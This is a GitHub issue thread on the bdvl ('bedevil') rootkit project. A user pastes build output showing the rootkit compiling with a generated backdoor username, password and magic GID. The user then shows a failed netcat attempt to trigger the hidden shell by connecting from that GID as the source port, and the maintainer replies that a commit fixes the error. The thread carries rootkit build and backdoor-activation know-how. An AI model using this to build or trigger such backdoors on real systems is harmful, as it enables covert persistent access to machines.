### ISSUE TITLE
fail

### ISSUE THREAD

**Issue by heimingdan** [naworkcaj/bdvl#6]
[root@iZj6cehezn48qz1b63jbobZ bdvl]# ./bedevil.sh -dc

   ___                    ___                             ___  
  (   )                  (   )                      .-.  (   ) 
   | |.-.     .--.     .-.| |    .--.    ___  ___  ( __)  | |  
   | /   \   /    \   /   \ |   /    \  (   )(   ) (''")  | |  
   |  .-. | |  .-. ; |  .-. |  |  .-. ;  | |  | |   | |   | |  
   | |  | | |  | | | | |  | |  |  | | |  | |  | |   | |   | |  
   | |  | | |  |/  | | |  | |  |  |/  |  | |  | |   | |   | |  
   | |  | | |  ' _.' | |  | |  |  ' _.'  | |  | |   | |   | |  
   | '  | | |  .'.-. | '  | |  |  .'.-.  ' '  ; '   | |   | |  
   ' `-' ;  '  `-' / ' `-'  /  '  `-' /   \ `' /    | |   | |  
    `.__.    `.__.'   `.__,'    `.__.'     '_.'    (___) (___) 
                                                             
                                                             
 [..] Building & writing C char arrays for the lib headers
 [..] Writing background variables
 [..] Getting hidden ports
 [..] Getting variable placeholders and their new values
Usage: passwd [options] [passwords]
where options are
-crypt             standard Unix password algorithm (default)
-1                 MD5-based password algorithm
-apr1              MD5-based password algorithm, Apache variant
-salt string       use provided salt
-in file           read passwords from file
-stdin             read passwords from stdin
-noverify          never verify when reading password from terminal
-quiet             no warnings
-table             format output as table
-reverse           switch table columns
/root/bdvl/etc/util.sh: line 70: qaxsolxv: command not found

 [..] BD_UNAME = yaaetdrg
 [..] BD_PWD = qaxsolxv
 [..] MAGIC_GID = 4385

 [..] Overwriting old variable placeholders with new settings
 [+] Rootkit compiled. (libthimbl.so.x86_64 - 53K)
 [+] Rootkit compiled. (libthimbl.so.i686 - 47K)

An error occurred ：
/root/bdvl/etc/util.sh: line 70: qaxsolxv: command not found

connection ：
[root@iZwz97gbwcchkuwm3j1y26Z ~]# nc 192.168.1.5 22 -p 4385
SSH-2.0-OpenSSH_7.
qaxsolxv
Protocol mismatch.
id
Ncat: Broken pipe.
[root@iZwz97gbwcchkuwm3j1y26Z ~]# 
Seems to be unsuccessful
Can you add a contact 
Telegram：@cy1975

**Comment by heimingdan** [comment]
Long-term focus on projects

**Comment by naworkcaj** [comment]
Thanks for submitting this. The latest commit should resolve the errors addressed in this issue. Considering that, I am going to close this thread, at least for the time being.
Thanks again.
